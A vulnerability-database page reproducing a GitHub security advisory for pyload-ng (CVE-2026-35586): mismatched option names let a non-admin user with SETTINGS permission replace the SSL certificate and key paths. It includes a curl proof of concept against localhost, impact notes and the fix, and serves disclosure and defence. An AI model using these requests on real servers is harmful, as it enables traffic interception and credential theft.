GHSA-PPVX-RWH9-7RJ7

Vulnerability from github – Published: 2026-04-08 00:04 – Updated: 2026-04-08 00:04
VLAI?
Summary
pyload-ng: Authorization Bypass for SSL Certificate/Key Configuration Due to Option Name Mismatch in pyload-ng
Details

Summary

The ADMIN_ONLY_CORE_OPTIONS authorization set in set_config_value() uses incorrect option names ssl_cert and ssl_key, while the actual configuration option names are ssl_certfile and ssl_keyfile. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the ssl_certchain option was never added to the admin-only set at all.

Details

The vulnerability is in src/pyload/core/api/__init__.py. The ADMIN_ONLY_CORE_OPTIONS set is defined at lines 237-248:

ADMIN_ONLY_CORE_OPTIONS = {
    ("general", "storage_folder"),
    ("log", "syslog_host"),
    ("log", "syslog_port"),
    ("proxy", "password"),
    ("proxy", "username"),
    ("reconnect", "script"),
    ("webui", "host"),
    ("webui", "ssl_cert"),      # BUG: should be "ssl_certfile"
    ("webui", "ssl_key"),       # BUG: should be "ssl_keyfile"
    ("webui", "use_ssl"),
}
# NOTE: ("webui", "ssl_certchain") is entirely missing

The actual config option names are defined in src/pyload/core/config/default.cfg:39-41:

file ssl_certfile : "SSL Certificate" = ssl.crt
file ssl_keyfile : "SSL Key" = ssl.key
file ssl_certchain : "CA's intermediate certificate bundle (optional)" =

The authorization check at line 267 compares the incoming (category, option) tuple against this set:

if (category, option) in ADMIN_ONLY_CORE_OPTIONS and not is_admin:
    self.pyload.log.error(...)
    return

When a request arrives with option=ssl_certfile, the check evaluates ("webui", "ssl_certfile") in ADMIN_ONLY_CORE_OPTIONS which is False because the set contains ("webui", "ssl_cert"), not ("webui", "ssl_certfile"). The admin-only guard is bypassed and config.set() at line 271 proceeds to write the attacker-supplied value.

The value is cast as a file type in parser.py:300-305, which resolves it via os.path.realpath() but performs no further validation:

elif typ in ("file", "folder"):
    return (
        ""
        if value in (None, "")
        else os.path.realpath(os.path.expanduser(os.fsdecode(value)))
    )

On server restart with SSL enabled, the webserver loads the attacker-controlled paths (webserver_thread.py:22-23,51-52):

self.certfile = self.pyload.config.get("webui", "ssl_certfile")
self.keyfile = self.pyload.config.get("webui", "ssl_keyfile")
# ...
self.server.ssl_adapter = BuiltinSSLAdapter(
    self.certfile, self.keyfile, self.certchain
)

PoC

Prerequisites: A pyLoad instance with SSL enabled and a non-admin user account that has SETTINGS permission.

Step 1: Authenticate as the non-admin user to get a session cookie:

curl -c cookies.txt -X POST 'http://localhost:8000/login' \
  -d 'username=settingsuser&password=password123'

Step 2: Set the SSL certificate to an attacker-controlled file path:

curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
  -H 'Content-Type: application/json' \
  -d '{"category": "core", "config": {"webui|ssl_certfile": "/tmp/attacker.crt"}}'

Expected response: true (config saved successfully)

Step 3: Set the SSL key to an attacker-controlled file path:

curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
  -H 'Content-Type: application/json' \
  -d '{"category": "core", "config": {"webui|ssl_keyfile": "/tmp/attacker.key"}}'

Expected response: true (config saved successfully)

Step 4: Set the SSL certificate chain (never protected):

curl -b cookies.txt -X POST 'http://localhost:8000/json/save_config' \
  -H 'Content-Type: application/json' \
  -d '{"category": "core", "config": {"webui|ssl_certchain": "/tmp/attacker-chain.crt"}}'

Expected response: true (config saved successfully)

Step 5: After the server restarts, it will load the attacker's certificate and key for all HTTPS connections.

Impact

A non-admin user with SETTINGS permission can replace the SSL certificate and key used by the pyLoad HTTPS server. When the server restarts (or is restarted by an admin), it will serve HTTPS using the attacker's certificate/key pair. This enables:

  • Man-in-the-Middle attacks: The attacker, possessing the private key for the now-active certificate, can intercept and decrypt all HTTPS traffic to the pyLoad instance, including admin credentials and session tokens.
  • Credential theft: All users (including admins) connecting over HTTPS will have their credentials exposed to the attacker.
  • Configuration tampering: With intercepted admin credentials, the attacker can escalate to full admin access.

The attack requires SSL to already be enabled by an admin (the use_ssl option is correctly protected), the attacker to place certificate/key files on the filesystem (potentially achievable via pyLoad's download functionality), and a server restart.

Recommended Fix

Fix the option names in ADMIN_ONLY_CORE_OPTIONS and add the missing ssl_certchain option in src/pyload/core/api/__init__.py:

ADMIN_ONLY_CORE_OPTIONS = {
    ("general", "storage_folder"),
    ("log", "syslog_host"),
    ("log", "syslog_port"),
    ("proxy", "password"),
    ("proxy", "username"),
    ("reconnect", "script"),
    ("webui", "host"),
    ("webui", "ssl_certfile"),    # Fixed: was "ssl_cert"
    ("webui", "ssl_keyfile"),     # Fixed: was "ssl_key"
    ("webui", "ssl_certchain"),   # Added: was missing entirely
    ("webui", "use_ssl"),
}
Severity ?
6.8 (Medium)
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "pyload-ng"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.5.0b3.dev97"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-35586"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T00:04:34Z",
    "nvd_published_at": "2026-04-07T17:16:34Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe `ADMIN_ONLY_CORE_OPTIONS` authorization set in `set_config_value()` uses incorrect option names `ssl_cert` and `ssl_key`, while the actual configuration option names are `ssl_certfile` and `ssl_keyfile`. This name mismatch causes the admin-only check to always evaluate to False, allowing any user with SETTINGS permission to overwrite the SSL certificate and key file paths. Additionally, the `ssl_certchain` option was never added to the admin-only set at all.\n\n## Details\n\nThe vulnerability is in `src/pyload/core/api/__init__.py`. The `ADMIN_ONLY_CORE_OPTIONS` set is defined at lines 237-248:\n\n```python\nADMIN_ONLY_CORE_OPTIONS = {\n    (\"general\", \"storage_folder\"),\n    (\"log\", \"syslog_host\"),\n    (\"log\", \"syslog_port\"),\n    (\"proxy\", \"password\"),\n    (\"proxy\", \"username\"),\n    (\"reconnect\", \"script\"),\n    (\"webui\", \"host\"),\n    (\"webui\", \"ssl_cert\"),      # BUG: should be \"ssl_certfile\"\n    (\"webui\", \"ssl_key\"),       # BUG: should be \"ssl_keyfile\"\n    (\"webui\", \"use_ssl\"),\n}\n# NOTE: (\"webui\", \"ssl_certchain\") is entirely missing\n```\n\nThe actual config option names are defined in `src/pyload/core/config/default.cfg:39-41`:\n\n```\nfile ssl_certfile : \"SSL Certificate\" = ssl.crt\nfile ssl_keyfile : \"SSL Key\" = ssl.key\nfile ssl_certchain : \"CA\u0027s intermediate certificate bundle (optional)\" =\n```\n\nThe authorization check at line 267 compares the incoming `(category, option)` tuple against this set:\n\n```python\nif (category, option) in ADMIN_ONLY_CORE_OPTIONS and not is_admin:\n    self.pyload.log.error(...)\n    return\n```\n\nWhen a request arrives with `option=ssl_certfile`, the check evaluates `(\"webui\", \"ssl_certfile\") in ADMIN_ONLY_CORE_OPTIONS` which is **False** because the set contains `(\"webui\", \"ssl_cert\")`, not `(\"webui\", \"ssl_certfile\")`. The admin-only guard is bypassed and `config.set()` at line 271 proceeds to write the attacker-supplied value.\n\nThe value is cast as a `file` type in `parser.py:300-305`, which resolves it via `os.path.realpath()` but performs no further validation:\n\n```python\nelif typ in (\"file\", \"folder\"):\n    return (\n        \"\"\n        if value in (None, \"\")\n        else os.path.realpath(os.path.expanduser(os.fsdecode(value)))\n    )\n```\n\nOn server restart with SSL enabled, the webserver loads the attacker-controlled paths (`webserver_thread.py:22-23,51-52`):\n\n```python\nself.certfile = self.pyload.config.get(\"webui\", \"ssl_certfile\")\nself.keyfile = self.pyload.config.get(\"webui\", \"ssl_keyfile\")\n# ...\nself.server.ssl_adapter = BuiltinSSLAdapter(\n    self.certfile, self.keyfile, self.certchain\n)\n```\n\n## PoC\n\nPrerequisites: A pyLoad instance with SSL enabled and a non-admin user account that has SETTINGS permission.\n\n**Step 1:** Authenticate as the non-admin user to get a session cookie:\n```bash\ncurl -c cookies.txt -X POST \u0027http://localhost:8000/login\u0027 \\\n  -d \u0027username=settingsuser\u0026password=password123\u0027\n```\n\n**Step 2:** Set the SSL certificate to an attacker-controlled file path:\n```bash\ncurl -b cookies.txt -X POST \u0027http://localhost:8000/json/save_config\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"category\": \"core\", \"config\": {\"webui|ssl_certfile\": \"/tmp/attacker.crt\"}}\u0027\n```\nExpected response: `true` (config saved successfully)\n\n**Step 3:** Set the SSL key to an attacker-controlled file path:\n```bash\ncurl -b cookies.txt -X POST \u0027http://localhost:8000/json/save_config\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"category\": \"core\", \"config\": {\"webui|ssl_keyfile\": \"/tmp/attacker.key\"}}\u0027\n```\nExpected response: `true` (config saved successfully)\n\n**Step 4:** Set the SSL certificate chain (never protected):\n```bash\ncurl -b cookies.txt -X POST \u0027http://localhost:8000/json/save_config\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"category\": \"core\", \"config\": {\"webui|ssl_certchain\": \"/tmp/attacker-chain.crt\"}}\u0027\n```\nExpected response: `true` (config saved successfully)\n\n**Step 5:** After the server restarts, it will load the attacker\u0027s certificate and key for all HTTPS connections.\n\n## Impact\n\nA non-admin user with SETTINGS permission can replace the SSL certificate and key used by the pyLoad HTTPS server. When the server restarts (or is restarted by an admin), it will serve HTTPS using the attacker\u0027s certificate/key pair. This enables:\n\n- **Man-in-the-Middle attacks:** The attacker, possessing the private key for the now-active certificate, can intercept and decrypt all HTTPS traffic to the pyLoad instance, including admin credentials and session tokens.\n- **Credential theft:** All users (including admins) connecting over HTTPS will have their credentials exposed to the attacker.\n- **Configuration tampering:** With intercepted admin credentials, the attacker can escalate to full admin access.\n\nThe attack requires SSL to already be enabled by an admin (the `use_ssl` option is correctly protected), the attacker to place certificate/key files on the filesystem (potentially achievable via pyLoad\u0027s download functionality), and a server restart.\n\n## Recommended Fix\n\nFix the option names in `ADMIN_ONLY_CORE_OPTIONS` and add the missing `ssl_certchain` option in `src/pyload/core/api/__init__.py`:\n\n```python\nADMIN_ONLY_CORE_OPTIONS = {\n    (\"general\", \"storage_folder\"),\n    (\"log\", \"syslog_host\"),\n    (\"log\", \"syslog_port\"),\n    (\"proxy\", \"password\"),\n    (\"proxy\", \"username\"),\n    (\"reconnect\", \"script\"),\n    (\"webui\", \"host\"),\n    (\"webui\", \"ssl_certfile\"),    # Fixed: was \"ssl_cert\"\n    (\"webui\", \"ssl_keyfile\"),     # Fixed: was \"ssl_key\"\n    (\"webui\", \"ssl_certchain\"),   # Added: was missing entirely\n    (\"webui\", \"use_ssl\"),\n}\n```",
  "id": "GHSA-ppvx-rwh9-7rj7",
  "modified": "2026-04-08T00:04:34Z",
  "published": "2026-04-08T00:04:34Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pyload/pyload/security/advisories/GHSA-ppvx-rwh9-7rj7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35586"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pyload/pyload"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "pyload-ng: Authorization Bypass for SSL Certificate/Key Configuration Due to Option Name Mismatch in pyload-ng"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.